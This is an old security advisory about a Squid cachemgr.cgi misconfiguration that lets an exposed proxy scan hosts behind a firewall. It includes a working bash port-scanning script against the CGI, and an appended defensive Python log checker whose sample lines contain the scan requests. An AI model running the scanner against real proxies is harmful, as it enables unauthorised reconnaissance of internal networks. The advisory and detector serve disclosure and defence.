]-* [IP6] Concept: Squid cachemgr.cgi misconfiguration

]-* [IP6] Configuration error [BID error class]

]-* [IP6] Platform investigated:

    Linux Redhat 6.2
    Squid 2.3STABLE4
    Apache 1.3.12

]-* [IP6] The problem...

    Due to a misconfiguration of Apache and Squid, it is possible to use
    the cachemgr.cgi shipped with Squid to scan hosts behind the corporate
    firewall.

    ...we can also gather a lot of information about the navigation,
    configuration...

    ...there is also a lot of code with bad programming habits!

    Here is a lil' script to demonstrate the error, not so clean, but useful.

--- Begin nasty code miscachemgr.cgi ---
#!/bin/bash -x
# Port scanning using a misconfigured squid
# using open apache
# Usage miscachemgr host_vuln host_to_scan end_port
# Concept: Jacobo Van Leeuwen & Francisco Sáa Muñoz
# Coded by Francisco Sáa Muñoz
# IP6 [Logic Control]

PORT=1
ONE='/cgi-bin/cachemgr.cgi?host='
TWO='&port='
THREE='&user_name=&operation&auth='

mkdir from_$1_to_$2

while [ $PORT -lt $3 ]; do
    # lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\
    # $2&port=$PORT&user_name=&operation=authenticate&auth= > \
    # port_$1_to_$2/$PORT.log 2>&1
    lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1
    let PORT=PORT+1
done
--- End nasty Code ---

]-* [IP6] Solution

    Deny access, configure it!

]-* [IP6] Thanks

    Thanks to all IP6 staff for the good feeling.

Signed,

--
Francisco Sáa Muñoz :: Nuno Treez (HLP)
Security Consultant/Tiger Team
IP6 Seguridad
http://www.ip6seguridad.com
--
Linux User #119288
Proud mame.dk user #115087
--
"What if I'm not elite? Ragna Gronvold says I'm special"
(yes, it's from rfp)
--

]-* [IP6] EOF
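
A defender's check for the abuse this advisory describes, as an added example that is not part of the original post: it reads Apache access-log lines and reports clients whose cachemgr.cgi requests name host/port targets outside an allow-list. The sample log lines, ALLOWED_TARGETS and SCAN_THRESHOLD are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache Common Log Format (not from the advisory).
SAMPLE_LOG = """\
192.0.2.10 - - [10/Jul/2000:10:00:01 +0200] "GET /cgi-bin/cachemgr.cgi?host=10.0.0.5&port=1&user_name=&operation&auth= HTTP/1.0" 200 512
192.0.2.10 - - [10/Jul/2000:10:00:02 +0200] "GET /cgi-bin/cachemgr.cgi?host=10.0.0.5&port=2&user_name=&operation&auth= HTTP/1.0" 200 512
192.0.2.10 - - [10/Jul/2000:10:00:03 +0200] "GET /cgi-bin/cachemgr.cgi?host=10.0.0.5&port=3&user_name=&operation&auth= HTTP/1.0" 200 512
192.0.2.20 - - [10/Jul/2000:10:05:00 +0200] "GET /cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=&operation=authenticate&auth= HTTP/1.0" 200 2048
192.0.2.30 - - [10/Jul/2000:10:06:00 +0200] "GET /index.html HTTP/1.0" 200 1024
"""

# Assumptions: the one cache this CGI should manage, and the alert threshold.
ALLOWED_TARGETS = {("localhost", 3128)}
SCAN_THRESHOLD = 3  # distinct off-list (host, port) targets per client

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+)')


def cachemgr_targets(log_text):
    """Yield (client, host, port) for each cachemgr.cgi request naming a host."""
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue
        client, url = match.groups()
        parts = urlsplit(url)
        if not parts.path.endswith("/cachemgr.cgi"):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)
        host = query.get("host", [""])[0].lower()
        port = query.get("port", [""])[0]
        if host:
            # -1 marks a missing or non-numeric port so it is still reported.
            yield client, host, int(port) if port.isdecimal() else -1


def find_abuse(log_text):
    """Map each client at or over the threshold to its sorted off-list targets."""
    seen = defaultdict(set)
    for client, host, port in cachemgr_targets(log_text):
        if (host, port) not in ALLOWED_TARGETS:
            seen[client].add((host, port))
    return {c: sorted(t) for c, t in seen.items() if len(t) >= SCAN_THRESHOLD}


if __name__ == "__main__":
    for client, targets in find_abuse(SAMPLE_LOG).items():
        print(client, "requested", len(targets), "off-list targets:", targets)
```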